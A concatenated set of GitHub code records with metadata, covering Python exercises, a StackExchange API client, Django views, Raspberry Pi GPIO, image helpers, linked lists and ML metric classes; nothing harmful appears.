'vlad']\n# a = sorted(list_, key=len, reverse=True)\n# print(a)\n\n# dict_ = {\n# 'john': 500,\n# 'tirion': 160_000,\n# 'tom': 150,\n# 'sanchar': 20,\n# 'ayana': 100_000,\n# }\n# print(dict_.items())\n# new_dict = dict(sorted(dict_.items(), key=lambda x: x [1], reverse=True))\n# print(new_dict)\n\n\"\"\"\nmap(function, iterable) - применяет к каждому элементу внутри iterable функцию,\n которая мы ей передаем в function, \nзакидывая в результат те данные, которые возврощает функции. 
\nВ результате мы получаем mapobject(iterator), в котором хранятся все наши данные.\n\"\"\"\n\n# ls = ['one', 'two', 'three', 'four']\n\n# new_list = list(map(lambda x: x.capitalize(), ls))\n# print(new_list)\n\n\n# ls = ['1', '2', '3']\n\n# new_list = list(map(int, ls))\n# print(new_list)\n\n\n# names = ['john', 'aria', 'baku', 'bakberdi', 'lilo']\n\n# new_list = list(map(lambda x: f'Hello mr\\mrs {x}', names))\n# print(new_list)\n\n\n'''\nФункция высшего порядка - функция, \nпринемает в качестве аргумента другую функцию\n'''\n'''\nfilter(function, iterable) - принемает ко всем элементам iterable функции, \nкоторую мы передали и возврощаем filterobject(итератор) только с теми элементами, \nдля которых функция вернула True\n'''\n\n# ls = ['one', 'lili', 'oleg', 'billi', 'tirion']\n# res = list(filter(lambda x: len(x) > 4, ls))\n# print(res)\n\n'''\nenumerate(iterable) - пронумеровывает каждый элемент внутри iterable ее собственным индексом \n'''\n\n# ls = ['str1', 'str2', 'str3']\n# new_list = list(enumerate(ls))\n# print(new_list)\n\n# def calculate_virus_cells(hours):\n# bact_per_min = 4\n# time_to_combine = 100 / bact_per_min\n# virus_cells_per_combine = 1\n# virus_cells = 1\n# for i in range(60 * hours):\n# new_bacteria = bact_per_min * virus_cells\n# if new_bacteria >= 100:\n# virus_cells += new_bacteria // 100\n# new_bacteria %= 100\n# virus_cells *= virus_cells_per_combine\n# virus_cells_per_combine += 1\n# return virus_cells\n# зк\n\n# def calculate_virus_cells(hours):\n# bact_per_min = 4\n# time_to_combine = 100 / bact_per_min\n# virus_cells_per_combine = 1\n# virus_cells = 1\n# for i in range(60 * hours):\n# new_bacteria = bact_per_min * virus_cells\n# if new_bacteria >= 100:\n# virus_cells += new_bacteria // 100\n# new_bacteria %= 100\n# virus_cells *= virus_cells_per_combine\n# virus_cells_per_combine += 1\n# return virus_cells\n\n# print(calculate_virus_cells(60)) # выведет 144\n\n#------------------------------------------------------------------\n\n# ls = [1, 2, 3, 4, 5]\n# new_list = list(map(lambda x: x * 82 if x % 2 == 0 else x, ls))\n# print(new_list)\n\n\n\n# from typing import List\n\n# class Solution:\n# def separateDigits(self, nums: List[int]) -> List[int]:\n# result = []\n# for num in nums:\n# digits = []\n# while num > 0:\n# digits.append(num % 10)\n# num //= 10\n# result.append(digits[::-1])\n# return result\n\n\n\n\nclass Alphabet:\n def __init__(self):\n self.a = 'QWERTY'\n self.c = 'ASDF'\n print(self.__c)\nobj = Alphabet()\nprint(obj.a)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"oldkayden/ev.28","sub_path":"Чисто для задание /builtin_func.py","file_name":"builtin_func.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5424122070","text":"import aiohttp\nfrom .dto import SearchResponse\n\nDEFAULT_FILTER = '!9_bDE.BDp'\n\n\nclass StackexchangeException(Exception):\n pass\n\n\nclass StackExchange:\n base_url = 'https://api.stackexchange.com/2.2'\n\n @classmethod\n async def search(cls, intitle, page=1, pagesize=25, sort=None, order=None, filter_=DEFAULT_FILTER):\n params = {\n 'site': 'stackoverflow',\n 'intitle': intitle,\n 'page': page,\n 'pagesize': pagesize,\n 'sort': sort,\n 'order': order,\n 'filter': filter_\n }\n params = {key: value for key,\n value in params.items() if value is not None}\n\n async with aiohttp.ClientSession() as session:\n async with session.get(f'{cls.base_url}/search', params=params) as response:\n if response.status != 
200:\n raise StackexchangeException(response.reason, await response.text())\n\n return SearchResponse(await response.json())\n","repo_name":"ramgml/stackexchange_service","sub_path":"stackexchange_client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30038794817","text":"\"\"\"\r\n\n\nGiven a list of 2D points `[x, y]`, create a function that returns `True` if\nthose points can be on the _bounds_ of a rectangle, `False` otherwise.\n\n![](https://edabit-challenges.s3.amazonaws.com/fhh2XNW.png)\n\n### Examples\n\n on_rectangle_bounds([[0, 1], [1, 0], [1, 1], [0, 0]]) ➞ True\n \n on_rectangle_bounds([[0, 1], [1, 0], [1, 1], [0.5, 0.5]]) ➞ False\n \n on_rectangle_bounds([[0, 1], [10, 0], [10, 1]]) ➞ True\n \n on_rectangle_bounds([[0, 1]]) ➞ True\n\n### Notes\n\nOnly rectangles with sides parallel to _x-axis_ and _y-axis_ will be\nconsidered.\n\n\"\"\"\r\n\ndef on_rectangle_bounds(points):\n x0 = min(p[0] for p in points)\n x1 = max(p[0] for p in points)\n y0 = min(p[1] for p in points)\n y1 = max(p[1] for p in points)\n return all( ((x == x0 or x == x1) and (y >= y0 and y <= y1)) or \\\n ((y == y0 or y == y1) and (x >= x0 and x <= x1)) \\\n for x, y in points )\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"2iQhC3t4SDZ6LGMWw_24.py","file_name":"2iQhC3t4SDZ6LGMWw_24.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10936257467","text":"withdraw = int(input('Insert how much money do you want to withdraw: R$'))\ntotal = withdraw\nc = 0\nnotes = 50\nwhile True:\n if total >= notes:\n total -= notes\n c += 1\n else:\n if c > 0:\n print(f'Total of {c} notes of R${notes},00')\n if notes == 50:\n notes = 20\n elif notes == 20:\n notes = 10\n elif notes == 10:\n notes = 1\n c = 0\n if total == 0:\n break\nprint('----------- END ----------')\n","repo_name":"PatrickAMenezes/PyExercises-CeV","sub_path":"Mundo2/ex 35.py","file_name":"ex 35.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"23497562264","text":"# Ejercicio 1\n\n# Mejora la implementación del código facilitado en interrupcionEdge.py para que no ocurran los problemas\n# descritos del mismo. 
Al fichero resultante denomínalo interrupcionEdgeBueno.py\n\n#!/usr/bin/env python3\n\nimport RPi.GPIO as GPIO\nimport time\n\npulsadorGPIO = 16\n\nif __name__ == '__main__':\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pulsadorGPIO, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n while True:\n GPIO.wait_for_edge(pulsadorGPIO, GPIO.RISING)\n print(\"El boton se ha pulsado\")\n time.sleep(0.1)\n\n# La solución a este ejercicio es muy sencilla: Al ejecutar el programa me he percatado de que se\n# muestra más de una vez el mensaje de pulsado cuando realmente solo he pulsado el botón una vez.\n# Para ello, lo único que he modificado del programa original es que a la última línea del programa,\n# dentro del bucle infinito, le he añadido un sistema antirebote (mencionado así en el enunciado de esta\n# práctica), que consiste en un time.sleep(0.1), ya que cuanto menor es la frecuencia, mayor será el\n# alivio para el procesador, y por tanto, evitaremos saturarlo.\n","repo_name":"aleon2020/SYA_2022-2023","sub_path":"Prácticas/Práctica 3: Uso de interrupciones para leer valores de un sensor/src/interrupcionEdgeBueno.py","file_name":"interrupcionEdgeBueno.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16596391375","text":"'''\nAdapted from https://github.com/naver/oasis/blob/master/image_helpers.py\n'''\n\nimport os\n\nimport numpy as np\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\n\nclass ImageOps:\n\tdef __init__(self):\n\n\t\tself.IMG_MEAN = np.array((104.00698793, 116.66876762, 122.67891434), dtype=np.float32)\n\n\t\tself.LABELS_DICT = {0:\"road\",\n\t\t\t\t\t\t\t1:\"sidewalk\",\n\t\t\t\t\t\t\t2:\"building\",\n\t\t\t\t\t\t\t3:\"wall\",\n\t\t\t\t\t\t\t4:\"fence\",\n\t\t\t\t\t\t\t5:\"pole\",\n\t\t\t\t\t\t\t6:\"light\",\n\t\t\t\t\t\t\t7:\"sign\",\n\t\t\t\t\t\t\t8:\"vegetation\",\n\t\t\t\t\t\t\t9:\"terrain\",\n\t\t\t\t\t\t\t10:\"sky\",\n\t\t\t\t\t\t\t11:\"person\",\n\t\t\t\t\t\t\t12:\"rider\",\n\t\t\t\t\t\t\t13:\"car\",\n\t\t\t\t\t\t\t14:\"truck\",\n\t\t\t\t\t\t\t15:\"bus\",\n\t\t\t\t\t\t\t16:\"train\",\n\t\t\t\t\t\t\t17:\"motocycle\",\n\t\t\t\t\t\t\t18:\"bicycle\"\n\t\t\t\t\t\t\t}\n\n\t\tself.PALETTE = [128, 64, 128, 244, 35, 232, 70, 70, 70, 102, 102, 156, 190, 153, 153, 153, 153, 153, 250, 170, 30,\n\t\t\t\t\t\t220, 220, 0, 107, 142, 35, 152, 251, 152, 70, 130, 180, 220, 20, 60, 255, 0, 0, 0, 0, 142, 0, 0, 70,\n\t\t\t\t\t\t0, 60, 100, 0, 80, 100, 0, 0, 230, 119, 11, 32] # 19x3 values, for Image's palette() module\n\n\t\tzero_pad = 256 * 3 - len(self.PALETTE)\n\t\tfor i in range(zero_pad):\n\t\t\tself.PALETTE.append(0)\n\n\tdef colorize_mask(self, mask):\n\t\t# mask: numpy array of the mask\n\t\tnew_mask = Image.fromarray(mask.astype(np.uint8)).convert('P')\n\t\tnew_mask.putpalette(self.PALETTE)\n\t\treturn new_mask\n\n\n\tdef get_concat_h(self, im1, im2):\n\t\tdst = Image.new('RGB', (im1.width + im2.width, max(im1.height, im2.height)))\n\t\tdst.paste(im1, (0, 0))\n\t\tdst.paste(im2, (im1.width, 0))\n\t\treturn dst\n\n\n\tdef get_concat_v(self, im1, im2):\n\t\tdst = Image.new('RGB', (max(im1.width, im2.width), im1.height + im2.height))\n\t\tdst.paste(im1, (0, 0))\n\t\tdst.paste(im2, (0, im1.height))\n\t\treturn dst\n\n\n\tdef process_image_for_saving(self, image, interp=None):\n\n\t\t# handling RGB input image\n# \t\timage = interp(image).cpu().numpy().squeeze()\n# \t\timage = np.transpose(image, (1, 2, 0))\n# \t\timage += self.IMG_MEAN\n# \t\timage = image[:, :, 
::-1]\n\t\timage = image.astype(np.uint8)\n\t\timage = Image.fromarray(image)\n\t\treturn image\n\n\n\tdef process_rescaled_image_for_saving(self, image, mean, std):\n\n\t\t# handling RGB input image\n\t\timage = image.cpu().numpy().squeeze()\n\t\timage = np.transpose(image, (1, 2, 0))\n\t\timage *= std\n\t\timage += mean\n\t\timage *= 255.\n\t\t#image = image[:, :, ::-1]\n\t\timage = image.astype(np.uint8)\n\t\treturn image\n\n\n\tdef save_concat_image(self, image, gt, pred, unc_map, save_path, image_name):\n\n\t\t\"\"\"\n\t\tSave concatenation of image, ground truth and prediction\n\t\t\"\"\"\n\n\t\timage_concat = self.get_concat_v(image, pred)\n\t\timage_concat = self.get_concat_v(gt, image_concat)\n\t\tunc_map = np.stack(\n\t\t\t\t(unc_map, np.zeros_like(unc_map), np.zeros_like(unc_map)),\n\t\t\t\taxis=2)\n\t\tunc_map_on_img = (0.4*np.array(image) + 0.6*unc_map).astype(np.uint8)\n\t\tunc_map_on_img = Image.fromarray(unc_map_on_img)\n\t\timage_concat = self.get_concat_v(image_concat, unc_map_on_img)\n\t\timage_concat_path = os.path.join(save_path, image_name)\n\t\timage_concat.save(image_concat_path)\n","repo_name":"naver/relis","sub_path":"image_helpers.py","file_name":"image_helpers.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"7839338656","text":"'''\nAuthor: yitong 2969413251@qq.com\nDate: 2023-02-22 15:57:59\n'''\nimport numpy as np\nimport abc\nfrom ..core import Node\n\n\nclass Metrics(Node):\n \"\"\"evaluation metric operator abstract base class\"\"\"\n\n def __init__(self, *parents, **kargs):\n # by default, the metrics node does not need to be saved in distributed training\n kargs['need_save'] = kargs.get('need_save', False)\n Node.__init__(self, *parents, **kargs)\n\n # initilze the node\n self.init()\n\n def reset(self):\n self.reset_value()\n self.init()\n\n @abc.abstractmethod\n def init(self):\n # the initlization node is implemented by concreted subclasses\n pass\n\n def get_jacobi(self):\n # we don't need to compute the jacobi for the metric nodes\n raise NotImplementedError()\n\n # it is convenient for its subclasses to call\n @staticmethod\n def prob_to_label(prob, thresholds=0.5):\n if prob.shape[0] > 1:\n # if it is multi-classification node, we need the category with the highest probability\n labels = np.argmax(prob, axis=0)\n else:\n # or decide the category based on the threshold\n labels = np.where(prob < thresholds, 0, 1)\n return labels\n\n\nclass Accuracy(Metrics):\n \"\"\"accuracy node\"\"\"\n\n def __init__(self, *parents, **kargs):\n Metrics.__init__(self, *parents, **kargs)\n\n def init(self):\n self.correct_num = 0\n self.total_num = 0\n\n def compute(self):\n \"\"\"\n compute ‘accuracy’: (TP + TN) / TOTAL\n we assume that the first parent node is the predicted value (probability), the second node is label\n \"\"\"\n pred = Metrics.prob_to_label(self.parents[0].value)\n gt = self.parents[1].value\n\n # the number of samples that predict correctly\n self.correct_num += np.sum(pred == gt)\n\n # the total number of samples\n self.total += len(pred)\n self.value = 0\n if self.total_num != 0:\n self.value = float(self.correct_num) / self.total_num\n\n\nclass Precision(Metrics):\n \"\"\"Precision metric\n to evaluate the positive samples that predict correctly\n \"\"\"\n\n def __init__(self, *parents, **kargs):\n Metrics.__init__(self, *parents, **kargs)\n\n def init(self):\n self.true_pos_num = 0\n self.pred_pos_num = 0\n\n def compute(self):\n 
\"\"\"compute precision: TP / (TP + FP)\"\"\"\n pred = Metrics.prob_to_label(self.parents[0].value)\n gt = self.parents[1].value\n\n # the number of samples predicted to be 1\n self.pred_pos_num += np.sum(pred == 1)\n\n # the number of samples predicted to be 1 and predicted correctly\n self.true_pos_num += np.sum(pred == gt and pred == 1)\n\n self.value = 0\n if self.pred_pos_num != 0:\n self.value = float(self.true_pos_num) / self.pred_pos_num\n\n\nclass Recall(Metrics):\n \"\"\"Recall node\"\"\"\n\n def __init__(self, *parents, **kargs):\n Metrics.__init__(self, *parents, **kargs)\n\n def init(self):\n self.gt_pos_num = 0\n self.true_pos_num = 0\n\n def compue(self):\n \"\"\"compute recall: TP / (TP + FN)\"\"\"\n pred = Metrics.prob_to_label(self.parents[0].value)\n gt = self.parents[1].value\n\n # the number of samples predicted to be 1\n self.get_pos_number += np.sum(gt == 1)\n\n # the number of smaples predicted to be 1 and predicted correctly\n self.gt_pos_number += np.sum(pred == gt and gt == 1)\n\n self.value = 0\n if self.gt_pos_num != 0:\n self.value = float(self.true_pos_num) / self.gt_pos_num\n\n\nclass ROC(Metrics):\n \"\"\"ROC curve\"\"\"\n\n def __init__(self, *parents, **kargs):\n Metrics.__init__(self, *parents, **kargs)\n\n def init(self):\n self.count = 100\n self.gt_pos_num = 0\n self.gt_neg_num = 0\n self.true_pos_num = np.array([0] * self.count)\n self.false_pos_num = np.array([0] * self.count)\n self.tpr = np.array([0] * self.count)\n self.fpr = np.array([0] * self.count)\n\n def compute(self):\n\n prob = self.parents[0].value\n gt = self.parents[1].value\n self.gt_pos_num += np.sum(gt == 1)\n self.gt_neg_num += np.sum(gt == -1)\n\n # the minimum is 0.01, the maximum is 0.99, step is 0.0.1 to generate 99 threshold\n thresholds = list(np.arange(0.01, 1.00, 0.01))\n\n # use respectively serveral thresholds to generate category prediction and compare them to labels\n for index in range(0, len(thresholds)):\n pred = Metrics.prob_to_label(prob, thresholds[index])\n self.true_pos_num[index] += np.sum(pred == gt and pred == 1)\n self.false_pos_num[index] += np.sum(pred != gt and pred == 1)\n\n # compute TPR and FPR respectively\n if self.get_pos_num != 0 and self.gt_neg_num != 0:\n self.tpr = self.true_pos_num / self.gt_pos_num\n self.fpr = self.false_pos_num / self.gt_neg_num\n\n\nclass ROC_AUC(Metrics):\n \"\"\"ROC AUC\"\"\"\n\n def __init__(self, *parents, **kargs):\n Metrics.__init__(self, *parents, **kargs)\n\n def init(self):\n self.gt_pos_preds = []\n self.gt_neg_preds = []\n\n def compute(self):\n prob = self.parents[0].value\n gt = self.parents[1].value\n\n assert prob.shape == gt.shape\n\n rows, cols = prob.shape\n\n for i in range(rows):\n for j in range(cols):\n if gt[i, j] == 1:\n self.gt_pos_preds.append(prob[i, j])\n else:\n self.gt_neg_preds.append(prob[i, j])\n self.total = len(self.gt_pos_preds) * len(self.gt_neg_preds)\n\n def value_str(self):\n count = 0\n\n # iterate m * n sample pairs, calculcate the number of positive probabilities greater than negative probabilties\n for gt_pos_pred in self.gt_pos_preds:\n for gt_neg_pred in self.gt_neg_preds:\n if gt_pos_pred > gt_neg_pred:\n count += 1\n\n self.value = float(count) / self.total\n\n return f\"{self.__class__.__name__}: {self.value:.4f}\"\n","repo_name":"minleminzui/py_dl","sub_path":"py_dl/ops/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":6146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
+{"seq_id":"5456469323","text":"\"\"\"\n\n This module cointains the controller aspect of MVC\n for this Django application\n\n\"\"\"\nfrom django.contrib.auth import authenticate, login\nfrom django.core import serializers\nfrom django.db.models import Count\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\nfrom .forms import TopicForm, CustomUserCreationForm, ResourceForm\nfrom .models import Topic, Resource, Votes\n\n\ndef index(request):\n \"\"\"\n\n This function is responsible for capturing the\n trending topics and displaying them on the index\n page of the site\n\n \"\"\"\n latest_topics = Topic.objects.all().annotate(\n resource_count=Count('resource')\n ).order_by('-resource_count')[:8]\n\n topic_form = TopicForm()\n context = {'latest_topics': latest_topics, 'topic_form': topic_form}\n return render(request, 'beres/index.html', context)\n\n\ndef detail(request, topic_id):\n \"\"\"\n\n This function is responsible for listing the Topic details.\n The detail will contain a listing of all of the corresponding resources\n\n \"\"\"\n\n topic = get_object_or_404(Topic, pk=topic_id)\n\n user_votes_by_resource_id = []\n\n if request.user.is_authenticated:\n user_votes_by_resource_id = Votes.objects.filter(\n user=request.user\n ).values_list('resource_id', flat=True)\n\n return render(\n request,\n 'beres/detail.html',\n {'topic': topic, 'user_votes': user_votes_by_resource_id}\n )\n\n\ndef new_topic(request):\n \"\"\"\n\n This function is responsible for creating a new topic\n\n \"\"\"\n if request.user.is_authenticated:\n if request.method == \"POST\":\n topic_form = TopicForm(request.POST)\n if topic_form.is_valid():\n name = request.POST['name']\n user = request.user\n topic = Topic(name=name, user=user)\n topic.save()\n return HttpResponseRedirect(reverse('beres:index'))\n else:\n topic_form = TopicForm()\n return render(\n request,\n 'beres/new_topic.html',\n {'topic_form': topic_form}\n )\n else:\n return HttpResponseRedirect(reverse('beres:index'))\n\n\ndef new_resource(request, topic_id):\n \"\"\"\n\n This function is responsible for rendering a new resource form\n\n \"\"\"\n\n if request.user.is_authenticated:\n form = ResourceForm()\n context = {'topic_id': topic_id, 'form': form}\n return render(request, 'beres/new_resource.html', context)\n\n return HttpResponseRedirect(reverse('beres:index'))\n\n\ndef save_resource(request, topic_id):\n \"\"\"\n\n This function is responsible for saving a new topic resource\n\n \"\"\"\n if request.user.is_authenticated:\n topic = get_object_or_404(Topic, pk=topic_id)\n form = ResourceForm(request.POST)\n if form.is_valid():\n try:\n url = request.POST['url']\n free = True if request.POST['free'] == 'Free' else False\n resource = Resource(\n topic=topic,\n url=url,\n free=free,\n user=request.user\n )\n resource.save()\n return HttpResponseRedirect(\n reverse('beres:detail', args=(topic.id,))\n )\n except Exception as e:\n return render(\n request,\n 'beres/new_resource.html',\n {'topic': topic, 'error_message': e}\n )\n else:\n return render(\n request,\n 'beres/new_resource.html',\n {'topic': topic, 'error_message': form.errors}\n )\n else:\n return HttpResponseRedirect(reverse('beres:index'))\n\n\ndef validate_topic_name(request):\n \"\"\"\n\n This function determines whether the entered topic name is valid. 
It does\n this by searching for any pre-existing records that contain the same name\n\n \"\"\"\n\n topic_name = request.GET.get('topic_name', None)\n data = {\n 'is_taken': Topic.objects.filter(name__iexact=topic_name).exists()\n }\n\n if data['is_taken']:\n data['error_message'] = 'A topic with this name already exists.'\n\n return JsonResponse(data)\n\n\ndef add_resource_vote(request):\n \"\"\"\n\n This function is responsible for adding user votes to a specified resource.\n A user can up-vote or down-vote a resource\n\n \"\"\"\n if request.user.is_authenticated:\n\n resource_id = request.GET.get('resource_id', None)\n resource = Resource.objects.get(pk=resource_id)\n vote_up = True if request.GET.get('vote_up', None) == \"true\" else False\n existing_vote = Votes.objects.filter(\n resource=resource,\n user=request.user\n )\n existing_vote_count = existing_vote.count()\n\n data = {}\n\n if existing_vote_count == 0:\n\n Votes.objects.create(\n resource=resource,\n user=request.user,\n voted_up=vote_up\n )\n\n elif existing_vote_count == 1:\n existing_vote.update(voted_up=vote_up)\n\n data['positive_votes'] = Votes.objects.filter(\n resource=resource,\n voted_up=True\n ).count()\n\n data['negative_votes'] = Votes.objects.filter(\n resource=resource,\n voted_up=False\n ).count()\n\n data['voted_up'] = vote_up\n\n return JsonResponse(data)\n\n\ndef search_topic_name(request):\n \"\"\"\n\n This function takes the current text that is entered into\n search and queries the database for any hits\n\n \"\"\"\n search_keyword = request.GET.get('search_topic_name', None)\n topics = serializers.serialize(\n \"json\",\n Topic.objects.filter(name__icontains=search_keyword)\n )\n\n data = {\n 'topics': topics\n }\n return JsonResponse(data)\n\n\ndef contact_us(request):\n \"\"\"\n\n This renders the contact us page\n\n \"\"\"\n return render(request, 'beres/contact_us.html')\n\n\ndef about_us(request):\n \"\"\"\n\n This renders the about us page\n\n \"\"\"\n return render(request, 'beres/about_us.html')\n\n\ndef register(request):\n \"\"\"\n\n This function is responsibile for registering new users\n\n \"\"\"\n if request.method == 'POST':\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return HttpResponseRedirect('/beres')\n else:\n form = CustomUserCreationForm()\n return render(request, 'registration/register.html', {'form': form})\n","repo_name":"josephlane/beres","sub_path":"beres/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"39573540265","text":"from os import path\nimport json\n\nsource_file_name = path.join(\"data\", \"task_5_7_data.txt\")\ntarget_file_name = path.join(\"data\", \"task_5_7_res.json\")\ncompanies_dict = dict()\n\ntry:\n\twith open(source_file_name, mode='r', encoding='utf-8') as file:\n\t\tfor line in file:\n\t\t\tcompanies_dict[line.split()[0]] = (tuple(line.split()[1:4]))\n\nexcept FileNotFoundError:\n\tprint(f\"File {source_file_name} was not found!\")\n\nprofit_dict = dict()\npositive_profit_cnt, positive_profit_sum = 0, 0\n\nfor comp, data in companies_dict.items():\n\tprofit = float(data[1]) - float(data[2])\n\tprofit_dict[comp] = profit\n\tif profit > 0:\n\t\tpositive_profit_cnt += 1\n\t\tpositive_profit_sum += 
profit\n\navg_profit = {\"average_profit\": positive_profit_sum / positive_profit_cnt}\n\noutput_list = [profit_dict, avg_profit]\n\nwith open(target_file_name, mode='w', encoding='utf-8') as file:\n\tjson.dump(output_list, file, indent=4, ensure_ascii=False)\n","repo_name":"Regbit/gb_python","sub_path":"lesson-5/task_5_7.py","file_name":"task_5_7.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"795826429","text":"import asyncio\nimport logging\nfrom aiogram.types import CallbackQuery\nfrom aiogram.utils.formatting import as_list, as_marked_section, Bold\nfrom aiogram.utils.keyboard import InlineKeyboardBuilder\n\nfrom diploma_task_parser.management.commands.keyboards.topics import get_inline_keyboard_rating\nfrom diploma_task_parser.models import Topic, Task\n\n\nasync def select_topics(call: CallbackQuery):\n try:\n loop = asyncio.get_event_loop()\n topics = await loop.run_in_executor(None, get_inline_keyboard)\n await call.message.answer(f'====='\n f'\\nТемы:'\n f'\\n=====',\n reply_markup=topics)\n await call.answer()\n except Exception as e:\n logging.error(f\"Error in select_topics: {e}\")\n\n\ndef get_topics():\n topics = []\n for i in Topic.objects.all():\n topics.append(i.name)\n return '\\n'.join(topics)\n\n\ndef get_inline_keyboard():\n topics = get_topics()\n\n keyboard_builder = InlineKeyboardBuilder()\n\n for i in topics.split('\\n'):\n if i.find(' '):\n keyboard_builder.button(text=i, callback_data=i)\n else:\n keyboard_builder.button(text=i, callback_data=i)\n\n keyboard_builder.adjust(3)\n return keyboard_builder.as_markup()\n\n\nasync def get_rating(call: CallbackQuery):\n await call.message.answer(\n f'Выберите рейтинг задачи: ',\n reply_markup=get_inline_keyboard_rating()\n )\n await call.answer()\n\n\nasync def select_task(call: CallbackQuery):\n topic = call.data\n\n try:\n loop = asyncio.get_event_loop()\n answer = await loop.run_in_executor(None, get_tasks, topic)\n\n answer_list = answer.split('\\n\\n')\n content = as_list(\n as_marked_section(\n Bold(\n f'Вы выбрали тему: \"{topic}\"'\n f'\\nТоп решаемых задач по этой теме:'\n ),\n answer_list[0],\n answer_list[1],\n answer_list[2],\n marker=\"\\n✅ \",\n ),\n )\n await call.message.answer(**content.as_kwargs())\n await call.answer(\n text=\"Спасибо, что воспользовались моим ботом!\",\n show_alert=True\n )\n except Exception as e:\n logging.error(f\"Error in select_topics: {e}\")\n\n\ndef get_tasks(topic):\n topic = Topic.objects.get(name=topic)\n tasks = []\n for i in Task.objects.all().filter(category=topic.id).order_by('-solved_count')[:3]:\n tasks.append(i.__str__())\n return '\\n\\n'.join(tasks)\n","repo_name":"Bonyfacci/my_project","sub_path":"diploma_task_parser/management/commands/handlers/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"808227336","text":"\n# importing pandas as pd\nimport pandas as pd\nfrom IPython.display import HTML\n \n# creating the dataframe\ndf = pd.read_csv('cities.csv')\n \nhtml = df.to_html()\n \n# write html to file\ntext_file = open(\"csvdata.html\", \"w\")\ntext_file.write(html)\ntext_file.close()","repo_name":"kimaprice/weather-equator","sub_path":"Resources/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
+{"seq_id":"18953617040","text":"class node:\n \n def __init__(self, value):\n self.data = value #we will pass the value here\n self.next = None # we will keep default adress as none when creating a node\n \n \nclass ll:\n \n def __init__(self): # here we are creating an empty linked list\n \n self.head = None\n self.n = 0 # keeps count of the number of nodes \n \n def __len__(self): # len of linked list is the number of nodes \n return self.n\n \n def insert_at_head(self, value):\n \n # create node\n new_node = node(value)\n \n #create connection\n new_node.next = self.head\n \n #reassign head\n self.head = new_node\n \n #increment n\n self.n += 1\n \n def traverse(self):\n \n cur = self.head\n \n while cur != None:\n \n print(cur.data)\n cur = cur.next\n \n def apppend(self, value):\n \n new_node = node(value)\n \n if self.head == None: #if wmpty ll then we make the new node itself as head\n # empty LL\n self.head = new_node\n self.n += 1\n return \n \n cur = self.head\n \n while cur.next != None:\n \n cur = cur.next\n \n #now at this point u are at the last node \n cur.next = new_node # this appending works when ll is not empty\n self.n += 1\n \n \n def insert_after(self, after, value): # for inserting after the particular element\n new_node = node(value) # first create a node\n \n cur = self.head\n \n while cur != None: # till it reaches the last element pull a loop\n if cur.data == after: # if item found then break the loop\n break\n \n cur = cur.next # continue finding\n \n \n if cur != None: # if the element is found in the ll then insert ht enew node\n new_node.next = cur.next\n cur.next = new_node\n self.n += 1\n \n\n else: #if not found in the ll\n print(\"not found\")\n return\n # case 1 break -> after is found\n # case 2 -> item is not found -> cur -> None\n \n print(cur.data)\n \n \n \n \n \nl = ll()\nl.insert_at_head(1)\nl.insert_at_head(2)\nl.insert_at_head(3)\nl.insert_at_head(4)\n\nl.insert_after(20, 200)\n\nprint(l.traverse())\n\n# print(\"-----------\")\n# l.apppend(5)\n# print(len(l))\n# print(l.traverse())\n\n\n","repo_name":"ANURAG-R-NAIK/LINKED-LISTS","sub_path":"insert middle.py","file_name":"insert middle.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41444384057","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nimport motmetrics as mm\n\nif __name__ == '__main__':\n\n # Create an accumulator that will be updated during each frame\n acc = mm.MOTAccumulator(auto_id=True)\n\n # Each frame a list of ground truth object / hypotheses ids and pairwise distances\n # is passed to the accumulator. 
